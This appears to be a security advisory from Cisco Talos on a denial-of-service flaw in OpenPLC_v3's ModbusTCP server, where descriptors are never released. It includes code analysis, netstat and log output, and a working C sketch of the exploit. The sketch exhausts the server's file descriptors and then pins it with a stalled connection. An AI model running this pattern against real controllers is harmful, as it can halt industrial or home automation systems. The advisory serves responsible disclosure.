A denial of service vulnerability exists in the ModbusTCP server functionality of OpenPLC_v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58. A specially crafted series of network connections can lead to the server not processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
OpenPLC_v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58
OpenPLC_v3 - https://github.com/thiagoralves/OpenPLC_v3
5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
CWE-775 - Missing Release of File Descriptor or Handle after Effective Lifetime
OpenPLC is an open-source programmable logic controller (PLC) designed to provide a low-cost option for automation. The platform consists of two parts: the Runtime and the Editor. The Runtime can be deployed on a variety of platforms, including Windows, Linux, and various microcontrollers. Common uses for OpenPLC include home automation and industrial security research. OpenPLC supports communication across a variety of protocols, including Modbus and EtherNet/IP. The Runtime additionally provides limited support for PCCC transported across EtherNet/IP.
A resource-exhaustion denial of service condition exists in OpenPLC’s handling of Modbus connections. By creating and abandoning many concurrent sessions and then holding one final connection open indefinitely, it is possible to exhaust all of the file descriptors available to the server process and disrupt new connections.
OpenPLC’s processing of Modbus messages begins in server.cpp in the function startServer, where an infinite loop waits for new connections on the defined port (TCP/502 by default). When a client attempts to connect, the function waitForClient establishes the connection via accept, resulting in a socket file descriptor being allocated for the connection ([1]). This connection is subsequently set to blocking mode ([2]).
int waitForClient(int socket_fd, int protocol_type)
{
char log_msg[1000];
int client_fd;
struct sockaddr_in client_addr;
...
while (*run_server)
{
client_fd = accept(socket_fd, (struct sockaddr *)&client_addr, &client_len); // [1]
if (client_fd > 0)
{
SetSocketBlockingEnabled(client_fd, true); // [2]
break;
}
sleepms(100);
}
return client_fd;
}
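The body of the SetSocketBlockingEnabled helper invoked at [2] is not shown in the excerpt above. A minimal sketch of the usual fcntl-based approach such a helper takes is shown below; the actual OpenPLC implementation may differ in detail.

#include <fcntl.h>
#include <stdbool.h>

/* Sketch of a typical fcntl-based blocking-mode toggle; assumed
   behavior, not the verbatim OpenPLC implementation. */
bool SetSocketBlockingEnabled(int fd, bool blocking)
{
    int flags = fcntl(fd, F_GETFL, 0);  /* read the current descriptor flags */
    if (flags == -1)
        return false;
    if (blocking)
        flags &= ~O_NONBLOCK;  /* clear O_NONBLOCK: read() blocks until data arrives */
    else
        flags |= O_NONBLOCK;   /* set O_NONBLOCK: read() returns immediately with EAGAIN */
    return fcntl(fd, F_SETFL, flags) == 0;
}

With O_NONBLOCK cleared, every subsequent read on the client socket parks the calling thread until data arrives or the connection ends, which is what makes the hang described later possible.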
When the connection is successfully established, a new thread calling the function handleConnections is created to process the new stream ([3]), and then the main thread’s execution loops back around to wait for the next connection.
void startServer(uint16_t port, int protocol_type)
{
...
while(*run_server)
{
client_fd = waitForClient(socket_fd, protocol_type);
...
else
{
int arguments[2];
pthread_t thread;
int ret = -1;
sprintf(log_msg, "Server: Client accepted! Creating thread for the new client ID: %d...\n", client_fd);
log(log_msg);
arguments[0] = client_fd;
arguments[1] = protocol_type;
ret = pthread_create(&thread, NULL, handleConnections, (void*)arguments); // [3]
if (ret==0)
{
pthread_detach(thread);
}
...
Inside handleConnections, Modbus messages are processed in a loop that cycles between waiting for a message from the client ([4]), processing that message, and responding accordingly or exiting ([5]).
void *handleConnections(void *arguments)
{
...
while(*run_server)
{
//unsigned char buffer[NET_BUFFER_SIZE];
//int messageSize;
if (protocol_type == MODBUS_PROTOCOL)
{
messageSize = readModbusMessage(client_fd, buffer, sizeof(buffer) / sizeof(buffer[0])); // [4]
}
...
if (messageSize <= 0 || messageSize > NET_BUFFER_SIZE)
{
// something has gone wrong or the client has closed connection
if (messageSize == 0)
{
sprintf(log_msg, "Modbus Server: client ID: %d has closed the connection\n", client_fd);
log(log_msg);
}
else
{
sprintf(log_msg, "Modbus Server: Something is wrong with the client ID: %d message Size : %i\n", client_fd, messageSize);
log(log_msg);
}
break;
}
processMessage(buffer, messageSize, client_fd, protocol_type); // [5]
}
...
readModbusMessage uses read calls ([6] and [7]) to ingest message data from the current stream and return the total number of bytes read. If a client stops transmitting after one of these read calls has been issued, but before a complete message has been received, the thread will block indefinitely because the socket was earlier placed in blocking mode ([2]).
int readModbusMessage(int fd, unsigned char *buffer, size_t bufferSize)
{
int messageSize = 0;
// Read the modbus TCP/IP ADU frame header up to the length field.
#define MODBUS_HEADER_SIZE 6
if (bufferSize < MODBUS_HEADER_SIZE)
{
return -1;
}
do
{
int bytesRead = read(fd, buffer + messageSize, MODBUS_HEADER_SIZE - messageSize); // [6]
if (bytesRead <= 0)
{
return bytesRead;
}
messageSize += bytesRead;
} while (messageSize < MODBUS_HEADER_SIZE);
// Read the length (byte 5 & 6).
uint16_t length = ((uint16_t)buffer[4] << 8) | buffer[5];
size_t totalMessageSize = MODBUS_HEADER_SIZE + length;
if (totalMessageSize > bufferSize)
{
return -1;
}
// Read the rest of the message.
while (messageSize < totalMessageSize)
{
int bytesRead = read(fd, buffer + messageSize, totalMessageSize - messageSize); // [7]
if (bytesRead <= 0)
{
return bytesRead;
}
messageSize += bytesRead;
}
return messageSize;
}
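For reference, the framing this parser expects is the standard Modbus TCP ADU. A hypothetical Read Holding Registers request illustrates how the length field consumed at [6] drives the second read at [7]:

/* Hypothetical Modbus TCP ADU: Read Holding Registers (function 0x03)
   from unit 1, starting address 0, quantity 2. */
unsigned char request[] = {
    0x00, 0x01, /* transaction ID                        */
    0x00, 0x00, /* protocol ID (0 = Modbus)              */
    0x00, 0x06, /* length: unit ID + PDU = 6 bytes       */
    0x01,       /* unit ID                               */
    0x03,       /* function code: Read Holding Registers */
    0x00, 0x00, /* starting address                      */
    0x00, 0x02  /* register count                        */
};
/* The first loop ([6]) reads the six bytes up to and including the
   length field; length = (buffer[4] << 8) | buffer[5] = 6, so the
   second loop ([7]) reads six more bytes, twelve in total. */

A client that completes the TCP handshake but never sends such a frame leaves the server thread parked inside the first read loop.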
Knowing this, it is possible for a client to tie up all of the socket file descriptors available to the OpenPLC process by opening a large number of connections but never sending an initial request. When this is successful, the host system will show a large list of sockets stuck in the CLOSE_WAIT state (shown below): each connection was closed by the client but, consistent with the CWE-775 classification above, its file descriptor is still being held open by the server.
user@machine:~/src/OpenPLC_v3$ sudo netstat -tpn | grep ":502" | wc -l
1003
user@machine:~/src/OpenPLC_v3$ sudo netstat -tpn | grep ":502" | head
tcp 1 0 10.211.55.20:502 10.211.55.40:50778 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:43992 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:46760 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:50816 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:46516 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:42970 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:43936 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:37884 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:47258 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:56744 CLOSE_WAIT 491897/./core/openp
user@machine:~/src/OpenPLC_v3$
This state is additionally reflected in the OpenPLC logs (shown below): the newly allocated file descriptors have climbed to values close to the maximum number of open files allowed for the process (1024 by default on Ubuntu, verifiable with ulimit -n).
...
Server: Client accepted! Creating thread for the new client ID: 1023...
Server: waiting for new client...
Server: Thread created for client ID: 1023
Modbus Server: client ID: 1023 has closed the connection
Terminating Modbus connections thread
Server: Client accepted! Creating thread for the new client ID: 1023...
Server: waiting for new client...
Server: Thread created for client ID: 1023
Modbus Server: client ID: 1023 has closed the connection
Terminating Modbus connections thread
Server: Client accepted! Creating thread for the new client ID: 1023...
Server: waiting for new client...
Server: Thread created for client ID: 1023
...
At this point the server has essentially been reduced to processing one connection at a time. By opening one final connection to the server (this time in blocking mode from the client side as well) and immediately making a recv call instead of sending a Modbus request, the attacker causes OpenPLC to block in readModbusMessage, waiting for a request that will never come. Since the process has already reached its maximum number of open files, subsequent accept calls fail (with EMFILE) and any new connections will not be reliably processed. A sketch of this connection pattern follows.
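The sketch below is illustrative only, not the Talos proof of concept; the target address and connection count are placeholders, and the count actually required depends on the server process’s descriptor limit and how many descriptors it already holds.

/* Sketch of the two-phase connection pattern described above. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

static int dial(const char *ip, uint16_t port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    inet_pton(AF_INET, ip, &addr.sin_addr);

    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) != 0)
    {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    const char *target = "10.211.55.20"; /* placeholder target address */

    /* Phase 1: open and abandon sessions without ever sending a
       request; each leaves an unreleased descriptor behind on the
       server (the CLOSE_WAIT sockets shown above). */
    for (int i = 0; i < 1020; i++)
    {
        int fd = dial(target, 502);
        if (fd >= 0)
            close(fd);
    }

    /* Phase 2: hold one final connection open and wait for data that
       will never arrive, pinning the server thread inside
       readModbusMessage on a blocking read. */
    int fd = dial(target, 502);
    if (fd >= 0)
    {
        unsigned char byte;
        recv(fd, &byte, 1, 0); /* blocks indefinitely */
    }
    return 0;
}

In practice the first loop may need light pacing so the server’s accept loop keeps up with the incoming connections.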
2025-07-16 - Vendor Disclosure
2025-07-16 - Vendor Response
2025-09-23 - Status Update Request
2025-09-23 - Vendor Response
2025-09-24 - Response Acknowledged
2025-10-07 - Public Release
Discovered by a member of Cisco Talos.